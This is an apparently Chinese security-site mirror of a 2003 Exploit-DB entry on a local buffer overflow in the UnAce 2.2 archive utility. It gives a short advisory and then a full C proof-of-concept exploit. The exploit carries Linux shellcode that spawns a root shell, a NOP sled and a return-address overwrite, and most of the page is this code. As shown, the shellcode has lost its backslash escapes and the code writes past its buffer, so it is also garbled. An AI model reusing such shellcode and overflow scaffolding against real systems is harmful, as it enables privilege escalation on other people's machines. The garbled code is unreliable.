Winace UnAce 2.2 – Command Line Argument Buffer Overflow (1)

Winace UnAce 2.2 – Command Line Argument Buffer Overflow (1)

漏洞ID 1054243 漏洞类型
发布时间 2003-11-10 更新时间 2003-11-10
图片[1]-Winace UnAce 2.2 – Command Line Argument Buffer Overflow (1)-安全小百科CVE编号 N/A
图片[2]-Winace UnAce 2.2 – Command Line Argument Buffer Overflow (1)-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23368
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9002/info

UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility as an argument, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce.

/* gEEk-unace.c
 *
 * PoC exploit made for advisory based uppon an local stack based overflow.
 * Vulnerable versions, maybe also prior versions:
 *
 * Unace v2.2
 *
 * Tested on:  Debian 3.0
 *
 * Advisory source: MegaHz
 * http://www.securityfocus.com/archive/1/344065/2003-11-07/2003-11-13/0
 *
 * -----------------------------------------
 * coded by: demz (geekz.nl) ([email protected])
 * -----------------------------------------
 *
 */

#include <stdio.h>
#include <stdlib.h>

char shellcode[]=

        "x31xc0"                      // xor          eax, eax
        "x31xdb"                      // xor          ebx, ebx
        "x31xc9"                      // xor          ecx, ecx
        "xb0x46"                      // mov          al, 70
        "xcdx80"                      // int          0x80

        "x31xc0"                      // xor          eax, eax
        "x50"                          // push         eax
        "x68x6ex2fx73x68"          // push  long   0x68732f6e
        "x68x2fx2fx62x69"          // push  long   0x69622f2f
        "x89xe3"                      // mov          ebx, esp
        "x50"                          // push         eax
        "x53"                          // push         ebx
        "x89xe1"                      // mov          ecx, esp
        "x99"                          // cdq
        "xb0x0b"                      // mov          al, 11
        "xcdx80"                      // int          0x80

        "x31xc0"                      // xor          eax, eax
        "xb0x01"                      // mov          al, 1
        "xcdx80";                     // int          0x80

int main()
{
        unsigned long ret = 0xbfffc260;

        char buffer[707];
        int i=0;

        memset(buffer, 0x90, sizeof(buffer));

        for (0; i < strlen(shellcode) - 1;i++)
        buffer[300 + i] = shellcode[i];

        buffer[707] = (ret & 0x000000ff);
        buffer[708] = (ret & 0x0000ff00) >> 8;
        buffer[709] = (ret & 0x00ff0000) >> 16;
        buffer[710] = (ret & 0xff000000) >> 24;
        buffer[711] = 0x0;

        printf("nUnace v2.2 local exploitn");
        printf("---------------------------------------- demz @ geekz.nl --n");

        execl("./unace", "unace", "e", buffer, NULL);
}

相关推荐: RSAREF Buffer Overflow Vulnerability

RSAREF Buffer Overflow Vulnerability 漏洞ID 1104496 漏洞类型 Boundary Condition Error 发布时间 1999-12-01 更新时间 1999-12-01 CVE编号 N/A CNNVD-ID…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享